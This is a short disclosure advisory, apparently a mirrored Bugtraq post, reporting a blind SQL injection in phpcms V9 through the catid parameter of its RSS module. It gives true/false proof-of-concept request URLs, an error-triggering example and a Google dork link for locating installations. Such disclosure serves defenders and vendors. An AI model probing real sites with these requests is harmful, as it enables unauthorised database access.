phpcms V9 BLind SQL Injection Vulnerability

From: eidelweiss@windowslive.com
To: bugtraq@securityfocus.com
Cc:
Subject: phpcms V9 BLind SQL Injection Vulnerability
Date:


=================================================================
  phpcms V9 BLind SQL Injection Vulnerability
=================================================================

Software:    phpcms V9
Vendor:           www.phpcms.cn
Vuln Type:    BLind SQL Injection
Download link:  http://www.phpcms.cn/2010/1229/326.html
Author:             eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home:             www.eidelweiss.info

Google Dork:       http://www.exploit-db.com/ghdb/3676/    // check here ^_^

References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

    exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

       Example p0c

[!]        http://host/index.php?m=content&c=rss&catid=10        <= True
[!]    http://host/index.php?m=content&c=rss&catid=-10       <= False

[+]      http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

=================================================================

   Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.